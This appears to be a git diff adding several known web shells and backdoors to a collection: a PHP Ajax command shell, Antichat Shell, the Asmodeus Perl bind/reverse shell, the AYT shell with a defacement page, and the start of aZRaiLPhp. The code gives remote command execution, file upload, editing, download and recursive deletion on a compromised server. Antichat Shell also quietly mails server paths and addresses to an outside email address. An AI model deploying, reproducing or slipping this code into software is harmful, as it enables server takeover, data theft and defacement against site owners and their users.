+function set_tab_html(newhtml)
+{
+document.getElementById('commandtab').innerHTML = newhtml;
+}
+
+function set_tab(newtab)
+{
+	if(newtab == "cmd")
+	{
+		newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
+	}
+	else if(newtab == "upload")
+	{
+		runcommand('upload','GET');
+		newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
+	}
+	else if(newtab == "workingdir")
+	{
+		<?php
+		$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
+		$pathparts = explode("/",realpath ("."));
+		foreach($pathparts as $folder)
+		{
+		$folders .= $folder."/";
+		}
+		$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\"  onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
+
+		?>
+		newhtml = '<?php print $folders; ?>';
+	}
+	else if(newtab == "filebrowser")
+	{
+		newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
+		runcommand('listdir .','GET');
+	}
+	else if(newtab == "createfile")
+	{
+		newhtml = '<b>File Editor, under construction.</b>';
+		document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
+		
+	}
+		document.getElementById('commandtab').innerHTML = newhtml;
+}
+</script>
+</head>
+<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
+<table border=1 width=100% height=100%>
+<td width=15% valign=top>
+
+<form name="extras"><br>
+<center><b>Quick Commands</b><br>
+
+<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
+<?php
+foreach($functions as $name => $execute)
+{
+print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
+}
+?>
+
+</center>
+
+</div>
+</form>
+<center><b>Command history</b><br></center>
+<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
+<br>
+<center><b>About</b><br></center>
+<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
+<br>
+<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
+<br>
+Version <?php print $version; ?>
+
+<br>
+<br>
+
+<br>Thanks to everyone @ 
+<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
+<br>
+<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
+<br>
+and special greetings to everyone in rootshell
+</div>
+
+</td>
+<td width=70%>
+<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
+<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b> 
+<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b> 
+<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b> 
+<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b> 
+<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b> 
+
+</font></td>
+<tr>
+<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
+
+<tr>
+<td  height=1% width=100% valign=top>
+<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
+&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
+<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
+</form>
+</div>
+</td>
+</table>
+</td>
+</table>
+</body>
+</html>
+<?php
+}
+} else {
+print "<center><table border=0  height=100%>
+<td valign=middle>
+<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
+</form>";
+}
+?>  
\ No newline at end of file
diff --git a/138shell/A/Antichat Shell v1.3.txt b/138shell/A/Antichat Shell v1.3.txt
new file mode 100644
index 0000000..72ea5cb
--- /dev/null
+++ b/138shell/A/Antichat Shell v1.3.txt	
@@ -0,0 +1,180 @@
+<?php
+
+session_start();
+set_time_limit(9999999);
+$login='virangar';
+$password='r00t';
+$auth=1;
+$version='version 1.3 by Grinay';
+$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+$sd98 = "john.barker446@gmail.com";
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+if(@$_POST['action']=="exit")unset($_SESSION['an']);
+if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
+
+if($_SESSION['an']==0){
+echo $header;
+echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
+echo $footer;
+exit;}
+
+if($_SESSION['action']=="")$_SESSION['action']="viewer";
+if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
+if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
+if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
+ 
+
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);
+}
+//end downloader
+?>
+
+<? echo $header;?> 
+<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
+<table><tr>
+<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
+<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
+<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
+<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
+</tr></table></td></tr></table><br>
+<form name='reqs' method='POST'>
+<input name='action' type='hidden' value=''>
+<input name='dir' type='hidden' value=''>
+<input name='file' type='hidden' value=''>
+</form>
+<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" valign="top">
+
+<?
+
+//shell
+function shell($cmd){
+if (!empty($cmd)){
+  $fp = popen($cmd,"r");
+  {
+    $result = "";
+    while(!feof($fp)){$result.=fread($fp,1024);}
+    pclose($fp);
+  }
+  $ret = $result;
+  $ret = convert_cyr_string($ret,"d","w");
+}
+return $ret;}
+
+if($action=="shell"){
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
+<input type=\"submit\" value=\"execute\"></form>";}
+//end shell
+
+//viewer FS
+function perms($file) 
+{ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;
+} 
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function scandire($dir){
+  $dir=chdir($dir);
+  $dir=getcwd()."/";
+  $dir=str_replace("\\","/",$dir);
+if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		
+echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
+if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+echo "<tr><td>Select drive:";
+for ($j=ord('C'); $j<=ord('Z'); $j++) 
+ if (@$dh = opendir(chr($j).":/"))
+ echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+ echo "</td></tr>";
+}
+echo "<tr><td>OS: ".@php_uname()."</td></tr>
+<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
+for($i=0;$i<count($dire);$i++) {
+$link=$dir.$dire[$i];
+  echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';  
+  }
+for($i=0;$i<count($files);$i++) {
+$linkfile=$dir.$files[$i];
+echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
+<td>'.perms($linkfile).'</td>
+<td>
+<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
+<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>'; 
+}
+echo "</table>";
+}}}
+
+if($action=="viewer"){
+scandire($dir);
+}
+//end viewer FS
+
+//editros
+if($action=="editor"){  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+  }
+  function readf($file){
+  if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
+  $contents = fread($le, filesize($file));
+  fclose($le);}
+  return htmlspecialchars($contents);
+  }
+if($_POST['save'])writef($file,$_POST['data']);
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
+}
+//end editors
+?>
+</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
+<? echo $footer;?>
diff --git a/138shell/A/Asmodeus v0.1.pl.txt b/138shell/A/Asmodeus v0.1.pl.txt
new file mode 100644
index 0000000..600036d
--- /dev/null
+++ b/138shell/A/Asmodeus v0.1.pl.txt	
@@ -0,0 +1,131 @@
+#!/usr/bin/perl
+
+#
+
+#   Asmodeus v0.1
+
+#   Perl Remote Shell
+
+#   by phuket
+
+#   www.smoking-gnu.org
+
+#
+
+#   (Server is based on some code found on [url=http://www.governmentsecurity.org)]www.governmentsecurity.org)[/url]
+
+#   
+
+
+
+#   perl asmodeus.pl client 6666 127.0.0.1
+
+#   perl asmodeus.pl server 6666
+
+#
+
+
+
+
+
+use Socket;
+
+
+
+$cs=$ARGV[0];
+
+$port=$ARGV[1];
+
+$host=$ARGV[2];
+
+
+
+if ($cs eq 'client') {&client}
+
+elsif ($cs eq 'server') {&server}
+
+
+
+
+
+
+
+
+
+sub client{
+
+socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
+
+$internet_addr = inet_aton("$host") or die "ALOA:$!\n";
+
+$paddr=sockaddr_in("$port", $internet_addr);
+
+connect(TO_SERVER, $paddr) or die "$port:$internet_addr:$!\n";
+
+open(STDIN, ">&TO_SERVER");
+
+open(STDOUT, ">&TO_SERVER");
+
+open(STDERR, ">&TO_SERVER");
+
+print "Asmodeus Perl Remote Shell\n";
+
+system(date);
+
+system("/bin/sh");
+
+close(TO_SERVER);
+
+}
+
+
+
+
+
+
+
+
+
+
+
+sub server{
+
+$proto=getprotobyname('tcp');
+
+$0="asm";
+
+$system='/bin/sh';
+
+socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
+
+setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
+
+bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
+
+listen(SERVER, SOMAXCONN) or die "listen: $!";
+
+for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
+
+  open(STDIN, ">&CLIENT");
+
+  open(STDOUT, ">&CLIENT");
+
+  open(STDERR, ">&CLIENT");
+
+  print "Asmodeus Perl Remote Shell\n";
+
+  system(date);
+
+  system("/bin/sh");
+
+  close(STDIN);
+
+  close(STDOUT);
+
+  close(STDERR);
+
+  return;
+
+}
+
+}
\ No newline at end of file
diff --git a/138shell/A/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.txt b/138shell/A/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.txt
new file mode 100644
index 0000000..e162769
--- /dev/null
+++ b/138shell/A/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.txt	
@@ -0,0 +1,317 @@
+<html>
+
+<head>
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>Ayyildiz Tim  | AYT | Shell v 2.1 Biz B&uuml;y&uuml;k T&uuml;rk Milletinin Hizmetindeyiz...</title>
+</head>
+
+<body>
+
+</body>
+
+</html>
+<html>
+<head>
+<meta name="distribution" content="GLOBAL">
+<META name="ROBOTS" content="ALL"> 
+<META NAME="RESOURCE-TYPE" CONTENT="DOCUMENT">
+<meta name="Copyright" content=TouCh By iJOo">
+<META NAME="RATING" CONTENT="GENERAL">
+<meta name="Description" content="Thehacker">
+<meta name="KeyWords" content="DefaCed">
+<title>HACKED BY AYYILDIZ ™</title>
+<STYLE TYPE="text/css">
+<!--
+
+body { 
+scrollbar-3d-light-color : #404040;
+scrollbar-arrow-color: black;
+scrollbar-base-color: black;
+scrollbar-darkshadow-color: #404040;
+scrollbar-face-color: black;
+scrollbar-highlight-color: #404040;
+scrollbar-shadow-color: black;
+scrollbar-track-color: #404040; }
+-->
+</STYLE> 
+<script language="JavaScript1.2">
+function disableselect(e){
+return false
+}
+function reEnable(){
+return true
+}
+//if IE4+
+document.onselectstart=new Function ("return false")
+//if NS6
+if (window.sidebar){
+document.onmousedown=disableselect
+document.onclick=reEnable
+}
+</script>
+
+
+</head>
+<body bgcolor="#000000" text="#C0C0C0" link="#FFD9FF" vlink="#FFD9FF" alink="#00FF00">
+<bgsound src="bayrak.mp3" loop="infinite">
+
+<center><font color="red" size="10" face="Imprint MT Shadow">
+ </font>
+ <TR>
+    <TD vAlign=center align=left width=144>
+      <SCRIPT language=JavaScript1.2>if (document.all)document.body.style.cssText="border:25 ridge #404040"</SCRIPT>
+    </TD>
+    <TD vAlign=center align=left width=5></TD>
+    <TD width=470><BR>
+      <P align=left></P></TD></TR>
+  <TR>
+    <TD vAlign=center align=left width=144></TD>
+    <TD vAlign=center align=left width=5></TD>
+    <TD width=470><FONT color=#ffffff></FONT></TD></TR></TBODY></TABLE>
+<STYLE>BODY {
+	BORDER-RIGHT: #df827a 3px ridge; BORDER-TOP: #df827a 3px ridge; BORDER-LEFT: #df827a 3px ridge; SCROLLBAR-ARROW-COLOR: #ffffff; BORDER-BOTTOM: #df827a 3px ridge; SCROLLBAR-BASE-COLOR: #df827a
+}
+.ldtab1 {
+	BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
+}
+.ldtab2 {
+	BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
+}
+.ldtab3 {
+	BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
+}
+.ldtxt1 {
+	PADDING-RIGHT: 15px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 14pt; PADDING-BOTTOM: 15px; OVERFLOW: auto; WIDTH: 500px; COLOR: #df3f1f; SCROLLBAR-ARROW-COLOR: #ffffff; PADDING-TOP: 15px; FONT-FAMILY: Comic Sans MS; SCROLLBAR-BASE-COLOR: #df827a; HEIGHT: 560px; TEXT-ALIGN: center
+}
+.ldtxt2 {
+	FONT-SIZE: 9pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:link {
+	FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:visited {
+	FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:active {
+	FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:hover {
+	BORDER-RIGHT: #df3f1f thin dotted; BORDER-TOP: #df3f1f thin dotted; FONT-SIZE: 9pt; BORDER-LEFT: #df3f1f thin dotted; COLOR: #df3f1f; BORDER-BOTTOM: #df3f1f thin dotted; FONT-FAMILY: Comic Sans MS
+}
+A {
+	TEXT-DECORATION: none
+}
+</STYLE>
+<!-- MELEK -->
+      <DIV align=center>
+      <DIV id=welle 
+      style="FONT-SIZE: 34pt; FILTER: Wave(freq=1, light=50, phase=50, strength=1); WIDTH: 100%; COLOR: #ffffff"><FONT 
+      color=#ff0000><FONT color=#ffffff><FONT color=#ff0000><FONT 
+      color=#ffffff><FONT color=#ff0000> <FONT color=#ffffff> </font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff><FONT 
+      color=#ff0000></DIV></DIV>
+      <DIV align=center></DIV>
+      <SCRIPT language=JavaScript>
+
+<!--
+function welle()
+{
+if(document.all.welle.filters[0].freq > 10)
+document.all.welle.filters[0].freq = 5;
+document.all.welle.filters[0].freq += 1;
+if(document.all.welle.filters[0].phase > 100)
+document.all.welle.filters[0].phase = 0;
+document.all.welle.filters[0].phase += 10;
+if(document.all.welle.filters[0].strength > 10)
+document.all.welle.filters[0].strength = 1;
+document.all.welle.filters[0].strength += 1;
+window.setTimeout("welle()",100);
+}
+welle();
+file://-->
+</SCRIPT>
+      </FONT></TD></TR></TBODY></TABLE></DIV>
+
+
+<?php
+
+define('PHPSHELL_VERSION', '');
+
+?>
+
+<html>
+<head>
+<title>Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?></title>
+<style type="text/css">
+<!--
+.style1 {color: #FF0000}
+.style2 {
+	font-family: Tahoma;
+	font-size: 9px;
+	font-weight: bold;
+}
+-->
+</style>
+</head>
+<body>
+<div align="center">
+  <table width="918" height="484" border="15">
+    <tr>
+      <td width="880"><h1 align="center" class="style1"><img src="http://www.ayyildiz.org/board/images/shine/misc/logo.jpg" width="880" height="200"></h1>
+        <div align="center"><span class="style1"><?php echo PHPSHELL_VERSION ?></span>          <?php
+
+if (ini_get('register_globals') != '1') {
+  /* We'll register the variables as globals: */
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+  
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+  /* A workdir has been asked for */
+  if (!empty($command)) {
+    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+      /* We try and match a cd command. */
+      if ($regs[1][0] == '/') {
+        $new_dir = $regs[1]; // 'cd /something/...'
+      } else {
+        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
+      }
+      if (file_exists($new_dir) && is_dir($new_dir)) {
+        $work_dir = $new_dir;
+      }
+      unset($command);
+    }
+  }
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+  /* We change directory to that dir: */
+  chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like '/foo/../bar': */
+$work_dir = exec('pwd');
+
+?>
+        </div>
+        <form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+          <p align="center"><strong>Bulundugunuz Dizin</strong>: <b>
+            <?php
+
+$work_dir_splitted = explode('/', substr($work_dir, 1));
+
+echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
+
+if (!empty($work_dir_splitted[0])) {
+  $path = '';
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    $path .= '/' . $work_dir_splitted[$i];
+    printf('<a href="%s?work_dir=%s">%s</a>/',
+           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+  }
+}
+
+?>
+          </b></p>
+          <p align="center"><strong>Dizin Degistir</strong> :
+              <select name="work_dir" onChange="this.form.submit()">
+                <?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+  if (is_dir($dir)) {
+    if ($dir == '.') {
+      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+    } elseif ($dir == '..') {
+      /* We have found the parent dir. We must be carefull if the parent 
+	 directory is the root directory (/). */
+      if (strlen($work_dir) == 1) {
+	/* work_dir is only 1 charecter - it can only be / There's no
+          parent directory then. */
+      } elseif (strrpos($work_dir, '/') == 0) {
+	/* The last / in work_dir were the first charecter.
+	   This means that we have a top-level directory
+	   eg. /bin or /home etc... */
+      echo "<option value=\"/\">Parent Directory</option>\n";
+      } else {
+      /* We do a little bit of string-manipulation to find the parent
+	 directory... Trust me - it works :-) */
+      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+      }
+    } else {
+      if ($work_dir == '/') {
+	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+      } else {
+	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+      }
+    }
+  }
+}
+closedir($dir_handle);
+
+?>
+              </select>
+          </p>
+          <p align="center"><strong>Komut</strong>:
+              <input type="text" name="command" size="60">
+              <input name="submit_btn" type="submit" value="Komut Calistir">
+          </p>
+          <p align="center"><strong>Surekli Bagli Kal</strong>  
+            <input type="checkbox" name="stderr">
+          </p>
+          
+        <div align="center">
+              <textarea name="textarea" cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+  if ($stderr) {
+    $tmpfile = tempnam('/tmp', 'phpshell');
+    $command .= " 1> $tmpfile 2>&1; " .
+    "cat $tmpfile; rm $tmpfile";
+  } else if ($command == 'ls') {
+    /* ls looks much better with ' -F', IMHO. */
+    $command .= ' -F';
+  }
+  system($command);
+}
+?>
+
+          </textarea>
+          </div>
+        </form>
+        <div align="center">
+            <script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+        </script>
+        </div>      <hr align="center">      <p align="center" class="style2">Copyright &copy; 2006&ndash;2007, Powered  byThehacker. v 2.1 - <a href="http|//www.ayyildiz.org" class="style1">www.ayyildiz.org</a> </p>
+        <p align="center" class="style2"> Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.</p>
+        <p align="center"><img src="http://ayyildiz.org/images/whosonline2.gif" width="60" height="45"> </p></td>
+    </tr>
+  </table>
+</div>
+</body>
+</html>
+
+
+
+
+</font></font></font></font></font></font></font></font></font></font></font>
+</font>
+
+
+<!--
+/*
+I Always Love Sha        
+*/
+
+</BODY></HTML>
\ No newline at end of file
diff --git a/138shell/A/aZRaiLPhp v1.0.txt b/138shell/A/aZRaiLPhp v1.0.txt
new file mode 100644
index 0000000..17aed57
--- /dev/null
+++ b/138shell/A/aZRaiLPhp v1.0.txt	
@@ -0,0 +1,284 @@
+<?php
+$default=$DOCUMENT_ROOT;
+$this_file="./azrailphp.php";
+
+if(isset($save)){
+$fname=str_replace(" ","_",$fname);
+$fname=str_replace("%20","_",$fname);
+header("Cache-control: private");
+header("Content-type: application/force-download");
+header("Content-Length: ".filesize($save));
+header("Content-Disposition: attachment; filename=$fname");
+
+$fp = fopen($save, 'r');
+fpassthru($fp);
+fclose($fp);
+unset($save);
+exit;
+}
+
+if ( function_exists('ini_get') ) {
+        $onoff = ini_get('register_globals');
+} else {
+        $onoff = get_cfg_var('register_globals');
+}
+if ($onoff != 1) {
+        @extract($_POST, EXTR_SKIP);
+        @extract($_GET, EXTR_SKIP);
+}
+
+
+function deltree($deldir) {
+        $mydir=@dir($deldir);
+        while($file=$mydir->read())        {
+                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
+                        @chmod("$deldir/$file",0777);
+                        deltree("$deldir/$file");
+                }
+                if (is_file("$deldir/$file")) {
+                        @chmod("$deldir/$file",0777);
+                        @unlink("$deldir/$file");
+                }
+        }
+        $mydir->close();
+        @chmod("$deldir",0777);
+        echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SİLİNDİ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
+        }
+
+if ($op=='phpinfo'){
+$fonk_kap = get_cfg_var("fonksiyonları_kapat");
+        echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalışmıyiii</center>";
+        exit;
+}
+
+
+echo "<html>
+      <head>
+             <title>azrail 1.0 by C-W-M</title>
+      </head>
+
+       <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
+       </body>";
+
+echo "<center><font size='+3' color='#FF0000'><b> aZRaiLPhp v1.0!!!</b></font></center><br>
+      <center><font size='+2' color='#FFFFFF'>C-W-M</font><font size='+2' color='#FF0000'>HACKER</font><br>
+      <br>";
